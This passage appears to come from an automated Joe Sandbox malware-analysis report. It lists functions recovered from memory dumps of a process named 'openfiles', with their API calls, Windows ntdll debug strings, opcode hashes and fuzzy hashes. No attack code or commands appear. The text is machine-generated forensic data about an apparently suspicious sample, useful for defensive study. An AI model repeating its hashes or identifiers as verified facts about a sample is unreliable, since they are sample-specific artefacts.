                                                                                                                                                  • Instruction Fuzzy Hash: 42E08C72A841466AFB40A6A4DC1AB9A22899B98744F4544A0B90CE7282D929F0404691
                                                                                                                                                  Function 007A105B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111), ref: 007A1067
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                  • Instruction ID: 218d090f3cbd8ebfb35872c44b2deeacc544c01b31c397cb1439de0265764098
                                                                                                                                                  • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                  • Instruction Fuzzy Hash: 30D02277B0000C7ABA2245D4ACC1DFFB72CEBC5AA6F004063FF08E2040E6218D020BB0
                                                                                                                                                  Function 007A8370 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,007A1F80,007B818F,OX{,007A1F46), ref: 007A83A3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                  • Opcode ID: c965f0eece465190afd2a15a9f40f7f68c5ab38c4371e4a7be65728a5541c137
                                                                                                                                                  • Instruction ID: 55a0f316137f535a0bdcb54e4dcd3379187db76d90410ac96d3d008d4f0f3c94
                                                                                                                                                  • Opcode Fuzzy Hash: c965f0eece465190afd2a15a9f40f7f68c5ab38c4371e4a7be65728a5541c137
                                                                                                                                                  • Instruction Fuzzy Hash: A3D05E716842097BFA40E6E5DC1BF5A328C8B84B54F5540A4B90CDB2C3EC59F55045A6
                                                                                                                                                  Function 049A2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 5f95bd89821471824d9afa840b8118212594b5efe182c2149d1c0c17a8dda3ec
                                                                                                                                                  • Instruction ID: af5cdee323d8401161546fffbd64736052392327eab3aac0742258f28af74b5d
                                                                                                                                                  • Opcode Fuzzy Hash: 5f95bd89821471824d9afa840b8118212594b5efe182c2149d1c0c17a8dda3ec
                                                                                                                                                  • Instruction Fuzzy Hash: F8B09B719015C5C5FB11F7604B0C71779586BD0705F15C0B1D2431651E4738D1D1E5F5

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 0484DF5E Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124762931.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4840000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                  • API String ID: 0-3558027158
                                                                                                                                                  • Opcode ID: 7c7e7d05391ad94d3202db7973293c7fb6faa178aa516727d55ca1a79c9e369a
                                                                                                                                                  • Instruction ID: 7b76c4475eb0cbe5d722189b67849e038d94ae96230f752fabd0c1e03ce720fc
                                                                                                                                                  • Opcode Fuzzy Hash: 7c7e7d05391ad94d3202db7973293c7fb6faa178aa516727d55ca1a79c9e369a
                                                                                                                                                  • Instruction Fuzzy Hash: 70915EF04482988AC7158F54A0652AFFFB1EBC6305F15856DE7E6BB243C3BE8905CB85
                                                                                                                                                  Function 049A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                  • Opcode ID: 71f360162e71e5149cb3e08507a6e71ac0531e5f8d73b1a3cf38d74d0c2abe86
                                                                                                                                                  • Instruction ID: 7280fe288aa8cab603d5fb64d8d254b64dd87bcb1f859159bb24a3a6c5fc1f08
                                                                                                                                                  • Opcode Fuzzy Hash: 71f360162e71e5149cb3e08507a6e71ac0531e5f8d73b1a3cf38d74d0c2abe86
                                                                                                                                                  • Instruction Fuzzy Hash: AD51C7B6A00116BFDB20DF98899097EF7B8BB88604B14C579E495D7741E234FE60CBE1
                                                                                                                                                  Function 04A12410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                  • Opcode ID: 856ec430d95d3206e89cbb454a90ae00287cb13e775937af18983400dce3cefb
                                                                                                                                                  • Instruction ID: 6d4108a3ae1aa6105cd8b4840eb5788dd650c295aa7e9ffc3e4ccf0cb8d96cca
                                                                                                                                                  • Opcode Fuzzy Hash: 856ec430d95d3206e89cbb454a90ae00287cb13e775937af18983400dce3cefb
                                                                                                                                                  • Instruction Fuzzy Hash: C6513C72A006456FDB30DF5CC990A7FB7F8DF88204B1484A9E4D6E7651E6B8FA00C760
                                                                                                                                                  Function 04997630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 049D4725
                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 049D4742
                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 049D4787
                                                                                                                                                  • ExecuteOptions, xrefs: 049D46A0
                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 049D4655
                                                                                                                                                  • Execute=1, xrefs: 049D4713
                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049D46FC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                  • Opcode ID: 18eb361314c168f908eb0f85492fcee61c21f785aeb5329e7d8bff072c60bad5
                                                                                                                                                  • Instruction ID: b98cdc7d1e035e7d64501880df18c2df36d0418bd7dfb12f4319cbc1deac2070
                                                                                                                                                  • Opcode Fuzzy Hash: 18eb361314c168f908eb0f85492fcee61c21f785aeb5329e7d8bff072c60bad5
                                                                                                                                                  • Instruction Fuzzy Hash: E251F431610219BBEF10AEE8DC89FAA77ECABC4304F0404F9E505AB180EB71BE41CE51
                                                                                                                                                  Function 049AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                  • Instruction ID: 9153ae1d085a33a5b335aedd362f35783ea0ed15e9ad2e2b5530006d08069c77
                                                                                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                  • Instruction Fuzzy Hash: 2A81D230E052499EDF24CE68C8507FEBBB6AF85320F184639DA61A7691C770B860CBD1
                                                                                                                                                  Function 04A120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                                                                  • API String ID: 48624451-2819853543
                                                                                                                                                  • Opcode ID: 4d35cf06f677b7a9e3e14052d81e031620c804332517fbff63a2c66e3e7e44ef
                                                                                                                                                  • Instruction ID: 215524a610f99986ea69818dc36d0faf1836727a98805ad28003feb0661c5191
                                                                                                                                                  • Opcode Fuzzy Hash: 4d35cf06f677b7a9e3e14052d81e031620c804332517fbff63a2c66e3e7e44ef
                                                                                                                                                  • Instruction Fuzzy Hash: 13213E77E01219ABDB10DFA9D840AEEBBF9EF94654F440166E945E3210E730FA118BA1
                                                                                                                                                  Function 0498F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049D02E7
                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049D02BD
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 049D031E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                  • Opcode ID: 4e3e7818b0c4bd040172e3847b02221c7841b078f4374ac3ca146ebb2675f68a
                                                                                                                                                  • Instruction ID: e98bcb2ac41879a725588637110a11ff6350224d357a0d458b3d191061053a8e
                                                                                                                                                  • Opcode Fuzzy Hash: 4e3e7818b0c4bd040172e3847b02221c7841b078f4374ac3ca146ebb2675f68a
                                                                                                                                                  • Instruction Fuzzy Hash: 45E1CD306047419FE725DF28C884B2AB7E5BB88328F144A7DF5A58B2E0E774F845CB52
                                                                                                                                                  Function 0499BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 049D7B7F
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 049D7BAC
                                                                                                                                                  • RTL: Resource at %p, xrefs: 049D7B8E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                  • Opcode ID: 59c88af7220a9053c261760bf8447b44907ece0530d28b4dc7e3b45ec6fdf33a
                                                                                                                                                  • Instruction ID: 577294b62bf4ec226000b2147367796d218d0a1ae8ab7b888d29e020feddcb5d
                                                                                                                                                  • Opcode Fuzzy Hash: 59c88af7220a9053c261760bf8447b44907ece0530d28b4dc7e3b45ec6fdf33a
                                                                                                                                                  • Instruction Fuzzy Hash: E141C2357407029FDB20EE29D840B6AB7E9FF88715F100A3DE95A9B680DB75F8058B91
                                                                                                                                                  Function 0499B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049D728C
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 049D7294
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 049D72C1
                                                                                                                                                  • RTL: Resource at %p, xrefs: 049D72A3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                  • Opcode ID: c5b4224d800cb91b5ee92533aaf2abe6a94970ef208afb641579005a21fecffb
                                                                                                                                                  • Instruction ID: a03b1cd95004795b4cbc28824958b3d702424219d6eb9ef7b9953d419048bf2b
                                                                                                                                                  • Opcode Fuzzy Hash: c5b4224d800cb91b5ee92533aaf2abe6a94970ef208afb641579005a21fecffb
                                                                                                                                                  • Instruction Fuzzy Hash: 9341FF31700246ABDB20DE69CC41F6AB7E9FB94714F104A39FA55AB240DB30F852DBD1
                                                                                                                                                  Function 04A12300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                  • Opcode ID: f2428eed9dfb4c46df865b4b6658b89115f274204b4d85a90b9fd3206d99ac04
                                                                                                                                                  • Instruction ID: cca49ce833f43bac1f24e66f5b07dd1caf872076c39404d563f5ba664ccf9fe8
                                                                                                                                                  • Opcode Fuzzy Hash: f2428eed9dfb4c46df865b4b6658b89115f274204b4d85a90b9fd3206d99ac04
                                                                                                                                                  • Instruction Fuzzy Hash: 9A318673A002199FDB20DF29CD40BEEB7B8EB44750F4445A5E849E3210EB30FA558FA1
                                                                                                                                                  Function 049A7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-
                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                  • Instruction ID: 67ae14bdacfee49f6d461c49b62f551b1f345643d46fbf507311757a9f67c880
                                                                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                  • Instruction Fuzzy Hash: 58919A70E402169FDF24DF99C8866BEB7A9EF44710F14457AE855E72D0E730E96087D0
                                                                                                                                                  Function 04969126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $$@
                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                  • Opcode ID: f152d63901466cb9db1788066ff565bf67ed736f67b1bd05aaa54fc2205d16ae
                                                                                                                                                  • Instruction ID: a4815fadfecf620be5a00ed5a068b918b0ac8b5d7fbc06f5b1061b5374e60b19
                                                                                                                                                  • Opcode Fuzzy Hash: f152d63901466cb9db1788066ff565bf67ed736f67b1bd05aaa54fc2205d16ae
                                                                                                                                                  • Instruction Fuzzy Hash: 21811BB1D002699BDB31DF54CD44BEEB7B8AB48714F1141EAA919B7240E7306E85CFA1